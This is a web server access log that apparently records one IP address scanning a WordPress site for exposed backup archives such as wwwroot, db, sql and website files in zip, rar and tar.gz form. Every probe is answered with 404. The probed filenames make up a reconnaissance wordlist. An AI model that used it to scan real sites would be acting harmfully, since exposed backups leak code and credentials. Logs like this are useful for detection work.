103.100.159.2 - - [18/Oct/2025:16:34:09 +0800] "HEAD /beifen.zip HTTP/1.1" 404 0 "http://cqqizhou.com/beifen.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:10 +0800] "HEAD /beifen.rar HTTP/1.1" 404 0 "http://cqqizhou.com/beifen.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:10 +0800] "HEAD /beifen.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/beifen.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:11 +0800] "HEAD /beifen.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/beifen.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:12 +0800] "HEAD /beian.zip HTTP/1.1" 404 0 "http://cqqizhou.com/beian.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:12 +0800] "HEAD /beian.rar HTTP/1.1" 404 0 "http://cqqizhou.com/beian.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:13 +0800] "HEAD /beian.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/beian.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:13 +0800] "HEAD /beian.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/beian.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:14 +0800] "HEAD /data.zip HTTP/1.1" 404 0 "http://cqqizhou.com/data.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:15 +0800] "HEAD /data.rar HTTP/1.1" 404 0 "http://cqqizhou.com/data.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:15 +0800] "HEAD /data.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/data.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:16 +0800] "HEAD /data.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/data.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:17 +0800] "HEAD /db.zip HTTP/1.1" 404 0 "http://cqqizhou.com/db.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:17 +0800] "HEAD /db.rar HTTP/1.1" 404 0 "http://cqqizhou.com/db.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:18 +0800] "HEAD /db.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/db.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:18 +0800] "HEAD /db.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/db.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:19 +0800] "HEAD /flashfxp.zip HTTP/1.1" 404 0 "http://cqqizhou.com/flashfxp.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:20 +0800] "HEAD /flashfxp.rar HTTP/1.1" 404 0 "http://cqqizhou.com/flashfxp.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:20 +0800] "HEAD /flashfxp.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/flashfxp.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:21 +0800] "HEAD /flashfxp.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/flashfxp.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:22 +0800] "HEAD /fdsa.zip HTTP/1.1" 404 0 "http://cqqizhou.com/fdsa.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:22 +0800] "HEAD /fdsa.rar HTTP/1.1" 404 0 "http://cqqizhou.com/fdsa.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:23 +0800] "HEAD /fdsa.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/fdsa.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:23 +0800] "HEAD /fdsa.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/fdsa.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:24 +0800] "HEAD /ftp.zip HTTP/1.1" 404 0 "http://cqqizhou.com/ftp.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:25 +0800] "HEAD /ftp.rar HTTP/1.1" 404 0 "http://cqqizhou.com/ftp.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:25 +0800] "HEAD /ftp.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/ftp.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:26 +0800] "HEAD /ftp.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/ftp.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:26 +0800] "HEAD /localhost.zip HTTP/1.1" 404 0 "http://cqqizhou.com/localhost.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:27 +0800] "HEAD /localhost.rar HTTP/1.1" 404 0 "http://cqqizhou.com/localhost.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:28 +0800] "HEAD /localhost.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/localhost.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:28 +0800] "HEAD /localhost.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/localhost.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:29 +0800] "HEAD /gg.zip HTTP/1.1" 404 0 "http://cqqizhou.com/gg.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:30 +0800] "HEAD /gg.rar HTTP/1.1" 404 0 "http://cqqizhou.com/gg.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:30 +0800] "HEAD /gg.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/gg.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:31 +0800] "HEAD /gg.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/gg.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:31 +0800] "HEAD /hdocs.zip HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:32 +0800] "HEAD /hdocs.rar HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:33 +0800] "HEAD /hdocs.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:33 +0800] "HEAD /hdocs.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:34 +0800] "HEAD /hdocs.zip HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:35 +0800] "HEAD /hdocs.rar HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:35 +0800] "HEAD /hdocs.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:36 +0800] "HEAD /hdocs.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/hdocs.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:36 +0800] "HEAD /HYTop.mdb.zip HTTP/1.1" 404 0 "http://cqqizhou.com/HYTop.mdb.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:37 +0800] "HEAD /HYTop.mdb.rar HTTP/1.1" 404 0 "http://cqqizhou.com/HYTop.mdb.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:38 +0800] "HEAD /HYTop.mdb.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/HYTop.mdb.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:38 +0800] "HEAD /HYTop.mdb.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/HYTop.mdb.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:39 +0800] "HEAD /root?.zip HTTP/1.1" 404 0 "http://cqqizhou.com/root?.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:40 +0800] "HEAD /root?.rar HTTP/1.1" 404 0 "http://cqqizhou.com/root?.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:40 +0800] "HEAD /root?.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/root?.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:41 +0800] "HEAD /root?.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/root?.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:42 +0800] "HEAD /Release.zip HTTP/1.1" 404 0 "http://cqqizhou.com/Release.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:42 +0800] "HEAD /Release.rar HTTP/1.1" 404 0 "http://cqqizhou.com/Release.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:43 +0800] "HEAD /Release.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/Release.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:44 +0800] "HEAD /Release.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/Release.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:44 +0800] "HEAD /Release.zip HTTP/1.1" 404 0 "http://cqqizhou.com/Release.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:45 +0800] "HEAD /Release.rar HTTP/1.1" 404 0 "http://cqqizhou.com/Release.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
36.133.115.36 - - [18/Oct/2025:16:34:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760776486.0553739070892333984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.100.159.2 - - [18/Oct/2025:16:34:46 +0800] "HEAD /Release.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/Release.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:46 +0800] "HEAD /Release.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/Release.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:47 +0800] "HEAD /sql?.zip HTTP/1.1" 404 0 "http://cqqizhou.com/sql?.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:48 +0800] "HEAD /sql?.rar HTTP/1.1" 404 0 "http://cqqizhou.com/sql?.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:48 +0800] "HEAD /sql?.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/sql?.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:49 +0800] "HEAD /sql?.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/sql?.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:49 +0800] "HEAD /test.zip HTTP/1.1" 404 0 "http://cqqizhou.com/test.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:50 +0800] "HEAD /test.rar HTTP/1.1" 404 0 "http://cqqizhou.com/test.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:51 +0800] "HEAD /test.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/test.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:51 +0800] "HEAD /test.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/test.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:52 +0800] "HEAD /template.zip HTTP/1.1" 404 0 "http://cqqizhou.com/template.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:52 +0800] "HEAD /template.rar HTTP/1.1" 404 0 "http://cqqizhou.com/template.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:53 +0800] "HEAD /template.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/template.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:54 +0800] "HEAD /template.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/template.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:54 +0800] "HEAD /template.zip HTTP/1.1" 404 0 "http://cqqizhou.com/template.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:55 +0800] "HEAD /template.rar HTTP/1.1" 404 0 "http://cqqizhou.com/template.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:56 +0800] "HEAD /template.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/template.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:56 +0800] "HEAD /template.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/template.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:57 +0800] "HEAD /upfile.zip HTTP/1.1" 404 0 "http://cqqizhou.com/upfile.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:58 +0800] "HEAD /upfile.rar HTTP/1.1" 404 0 "http://cqqizhou.com/upfile.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:58 +0800] "HEAD /upfile.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/upfile.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:59 +0800] "HEAD /upfile.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/upfile.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:34:59 +0800] "HEAD /vip.zip HTTP/1.1" 404 0 "http://cqqizhou.com/vip.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:00 +0800] "HEAD /vip.rar HTTP/1.1" 404 0 "http://cqqizhou.com/vip.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:01 +0800] "HEAD /vip.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/vip.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:01 +0800] "HEAD /vip.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/vip.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:02 +0800] "HEAD /wangzhan.zip HTTP/1.1" 404 0 "http://cqqizhou.com/wangzhan.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:03 +0800] "HEAD /wangzhan.rar HTTP/1.1" 404 0 "http://cqqizhou.com/wangzhan.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:03 +0800] "HEAD /wangzhan.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/wangzhan.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:04 +0800] "HEAD /wangzhan.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/wangzhan.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:04 +0800] "HEAD /web.zip HTTP/1.1" 404 0 "http://cqqizhou.com/web.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:05 +0800] "HEAD /web.rar HTTP/1.1" 404 0 "http://cqqizhou.com/web.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:06 +0800] "HEAD /web.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/web.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:06 +0800] "HEAD /web.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/web.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:07 +0800] "HEAD /website.zip HTTP/1.1" 404 0 "http://cqqizhou.com/website.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:08 +0800] "HEAD /website.rar HTTP/1.1" 404 0 "http://cqqizhou.com/website.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:08 +0800] "HEAD /website.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/website.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:09 +0800] "HEAD /website.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/website.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:09 +0800] "HEAD /wwwroot.zip HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:10 +0800] "HEAD /wwwroot.rar HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:11 +0800] "HEAD /wwwroot.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:11 +0800] "HEAD /wwwroot.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:12 +0800] "HEAD /wwwroot.zip HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:13 +0800] "HEAD /wwwroot.rar HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:13 +0800] "HEAD /wwwroot.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:14 +0800] "HEAD /wwwroot.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/wwwroot.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:15 +0800] "HEAD /wz.zip HTTP/1.1" 404 0 "http://cqqizhou.com/wz.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:15 +0800] "HEAD /wz.rar HTTP/1.1" 404 0 "http://cqqizhou.com/wz.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:16 +0800] "HEAD /wz.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/wz.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:16 +0800] "HEAD /wz.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/wz.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:17 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.zip HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:18 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.rar HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:18 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:19 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:20 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%D5%BE.zip HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD~.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:20 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%D5%BE.rar HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD~.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:21 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%D5%BE.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD~.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:21 +0800] "HEAD /%EF%BF%BD%EF%BF%BD%D5%BE.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD%EF%BF%BD~.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [18/Oct/2025:16:35:22 +0800] "HEAD /%EF%BF%BD%C2%BD%EF%BF%BD%EF%BF%BD%C4%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD.zip HTTP/1.1" 404 0 "http://cqqizhou.com/%EF%BF%BD\xBD%EF%BF%BD%EF%BF%BD<%EF%BF%BD%EF%BF%BD%EF%BF%BD.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
